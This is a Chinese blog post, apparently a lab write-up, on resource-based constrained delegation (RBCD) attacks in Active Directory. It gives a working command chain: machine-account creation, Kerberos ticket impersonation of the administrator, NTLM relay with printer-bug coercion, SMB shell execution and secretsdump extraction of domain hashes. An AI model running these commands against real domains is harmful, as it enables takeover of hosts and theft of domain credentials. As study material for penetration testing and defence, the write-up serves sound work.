域渗透委派攻击之基于资源的约束委派

最新推荐文章于 2024-06-02 15:21:42 发布
最新推荐文章于 2024-06-02 15:21:42 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 内网域环境 文章标签: 安全 web安全 windows 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicai321/article/details/122679357
版权

文中主要讲解内网域环境,通过学习掌握域环境,更快知晓内网工作原理。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

委派攻击之基于资源的约束委派

原理:

基于资源的约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。

漏洞复现:

资源委派攻击其他域主机获取system权限
使用csc进行编译生成exe文件:
在这里插入图片描述
查询到加入域主机的域用户:
在这里插入图片描述
使用SharpAllowedToAct生成机器账号:
工具下载地址:
https://github.com/HPVCA/SharpAllowedToAct

SharpAllowedToAct.exe -m hacker -p pass@123 -t 12server2 -a 10.10.10.142 redteam.club

在这里插入图片描述
在这里插入图片描述
获取服务票据:

python3 getST.py -dc-ip 10.10.10.142 redteam/hacker\$:pass@123 -spn cifs/12server2.redteam.club -impersonate administrator

在这里插入图片描述
设置环境变量:

export KRB5CCNAME=administrator.ccache #将这个票据进行设置

获取域普通主机system权限:

python3 smbexec.py -no-pass -k 12server2.redteam.club

在这里插入图片描述

python3 addcomputer.py -method SAMR -dc-ip 10.10.10.142 -computer-name long -computer-pass pass@123 "redteam.club/hack:pass@123"

在这里插入图片描述

python3 ntlmrelayx.py -t ldap://10.10.10.142 -smb2support --remove-mic --delegate-access --escalate-user long\$ -debug

在这里插入图片描述

python3 printerbug.py redteam.club/hack:pass@123@10.10.10.140 10.10.10.128

在这里插入图片描述
在这里插入图片描述

python3 getST.py -dc-ip 10.10.10.142 redteam/long\$:pass@123 -spn cifs/ad2.redteam.club -impersonate administrator

在这里插入图片描述

python3 secretsdump.py -k -no-pass ad2.redteam.club -just-dc-user administrator
python3 secretsdump.py -k -no-pass ad2.redteam.club -just-dc-ntlm
python3 smbexec.py -no-pass -k ad2.redteam.club
全局变量Global
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 7
    评论
专栏目录
SharpAllowedToAct:通过基于资源约束委派(msDS-AllowedToActOnBehalfOfOtherIdentity)进行计算机对象接管
05-24
夏普允许行动 描述 基于通过基于资源约束委派(MSDS-AllowedToActOnBehalfOfOtherIdentity)C#实现的计算机对象接管的由 。 积分也他的,并作为我的代码依赖于他的工具。 编译指令 确保成功安装了必要的NuGet软件包,并仅构建项目。
渗透之基于资源约束委派
qq_56426046的博客
11-15 439
REDTEAM\hack -> WriteProperty(将机器加入的账号,也就是mS-DS-CreatorSID属性中的账户) NT AUTHORITY\SELF -> WriteProperty(机器账户自身也可以修改) 我们再回顾一个知识点,默认控的ms-DS-MachineAccountQuota属性设置允许所有用户向一个添加 多达10个计算机帐户,就是说只要有一个凭据就可以在内任意添加机器账户。RBCD把设置委派权限赋予了机器自身,既机器自己可以决定 谁可以被委派来控制我。
攻击--->基于资源约束委派(RBCD)
最新发布
huohaowen的博客
06-02 715
基于资源约束委派RBCD他来啦~~~!!!
python遍历当前文件夹没有写权限_ubuntu16.04下 python编程修改文件夹权限、读写数据库等操作...
weixin_39860757的博客
01-30 513
1.python编程修改文件夹权限import osos.system('chmod 777 ', file)扩展:Linux系统中,每个用户的角色和权限划分的很细致也很严格,每个文件(目录)都设有访问许可权限,利用这种机制来决定某个用户通过某种方式对文件(目录)进行读、写、执行等操作。操作文件或目录的用户,有3种不同类型:文件所有者、群组用户、其他用户。最高位表示文件所有者的权限值,中间位表示...
python如何获取权限_某云平台渗透之-python shell获取root权限
weixin_39950764的博客
11-24 694
2018年的第一天,祝大家365天元气满满!话不多说,先打响新年第一炮(不好意思,我又污了=.=)***本系列内容仅用于技术分享,请勿对号入座***之前有讲过要分享一些云平台渗透的经验,其中最有意思的就属这个python shell了。首先经过fuzzing发现了这样一个console口:根据路径判断,这个应该是python的交互式shell,也就是我们平时在cmd命令行敲“python”之后出来...
权限维持】-基于资源约束委派(RBCD)
qq_41617902的博客
01-20 833
基于资源约束委派(RBCD)
rubeus+spoolsample.zip渗透约束委派攻击实验
08-19
在网络安全,特别是针对Windows环境的渗透测试中,非约束委派攻击是一种常见的攻击手段。本实验“rubeus+spoolsample.zip”旨在模拟这种攻击,以揭示潜在的安全风险并帮助管理员加强防御措施。以下是关于非...
rbcd-attack:使用Impacket从外部进行基于Kerberos资源约束委派攻击
04-01
滥用基于Kerberos资源约束委派 TL; DR 此存储库是针对Windows Active Directory中针对Kerberos资源约束委派的实际攻击。 与其他常见实施方式的不同之处在于,我们是从Windows Domain外部发起攻击的,而不是...
渗透完全技巧.pdf
10-03
1.无凭证情况下 网络扫描 漏洞快速探测 提权 拥有本地管理员权限 ...token窃取 ...卷影拷贝(获取控所有hash) dpapi解密 ...Kerberos委派 地址解析协议 zerologon漏洞 CVE-2021-42278 && CVE-2021-42287
java设计模式之委派模式原理分析
08-25
"java设计模式之委派模式原理分析" 委派模式(Delegate Pattern)是一种常用的设计模式,它允许对象将请求委托给另一个对象,以便完成特定的任务。在 Java 中,委派模式通常用于实现松耦合、灵活性高的系统设计。 ...
活动目录加入权限委派.docx
09-27
活动目录加入权限委派 活动目录加入权限委派是指在Active Directory中,将计算机加入权限委派给特定的用户或组,以便他们可以管理和维护中的计算机对象。这种权限委派可以提高中的安全性和管理...
基于资源约束委派
mingyqf的博客
02-23 824
参考:https://blog.csdn.net/nicai321/article/details/122679357 原理: 基于资源约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要管理员权限去设置相关属性。RBCD把设置委派权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。 漏洞复现: 资
Windows 内网渗透委派攻击
qq_53742230的博客
07-31 1306
委派攻击的三种攻击手法
基于资源约束委派攻击
good good study
04-13 2092
基于资源约束委派 (RBCD:Resource Based Constrained Delegation):为了使⽤户/资源更加独⽴,微软在Windows Server 2012中引⼊了基于资源约束委派。基于资源约束委派不需要管理员权限去设置,⽽把设置属性的权限赋予给了机器⾃身。 配置了基于资源约束委派的账户的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性的值为被允许基于资源约束委派的账号的SID。如admin--pc的 msDS-AllowedT
Kerberos 委派攻击之基于资源约束委派
Adminxe的博客
03-06 616
CSDN自动迁移博客文章注意区别:约束委派 不能跨进行委派,基于资源约束委派可以跨和林如果约束委派,必须拥有权限,该特权是敏感的,通常仅授予管理员。为了使用户/资源更加独立,Windows Server 2012 中引入了基于资源约束委派。基于资源约束委派不需要管理员权限去设置,而是把设置属性的权限赋予给了机器自身。基于资源约束委派允许资源配置受信任的帐户委派给他们。基于资源约束委派只能在运行 ·Windows Server 2012 及以上的控制器·上配置,
python获取管理员权限
spuerOUTSYSTEM的博客
07-09 7384
1.以管理员运行 cmd 这个方法很简单,也无需多说,右键以管理员运行就可以了,然后在里面运行 python 脚本就有管理员权限了。 2. 用 cmd 脚本获取 假设我要运行的文件是 test.py,则我可以写一个 cmd 脚本,不妨叫做 go.cmd,在里面写入: @echo off %1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.clo
(转载)python如果获取windows管理员权限(二)
jarthong的博客
05-22 1264
本文为转载,链接:https://blog.csdn.net/qq_17550379/article/details/79006718 我们在python如果获取windows管理员权限(一)中谈到了UAC的问题。 很多时候我们不希望我们的软件弹出UAC提示,这个时候我们可以通过注册表的方法去解决。这其实已经不在是一个安全的编程了,它变成了一把双刃剑。 当然我们只是讨论这种问题该怎么解决。具体用在什么方面那是你的问题咯! 通过下面的代码我们可以轻松绕过UAC # -*- coding: utf-8
管理员身份获得 SYSTEM 权限的四种方法
编程爱好者
02-19 6803
本文总结了 4 种方法获得 SYSTEM 权限来运行 regedit.exe 文件,源代码很容易修改成命令行方式运行指定的程序。1. 以服务方式运行2. 添加 ACL 的方法3. HOOK ZwCreateProcessEx 函数4. 远程线程的方法  这几种方法都不是我想出来的,我只不过是总结了一下,用 Win32ASM 重写了代码而以。关于这个大家可以看文章末尾的参考资料。下面简单的分析每一种
计算机网络-组织单位与委派控制-图文.pptx
11-21
"计算机网络-组织单位与委派控制-图文.pptx" 计算机网络中的组织单位(Organizational Unit, OU)是Windows操作系统,特别是Active Directory(AD)服务中的一种重要概念。OU是从Windows 2000开始引入的,旨在解决...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值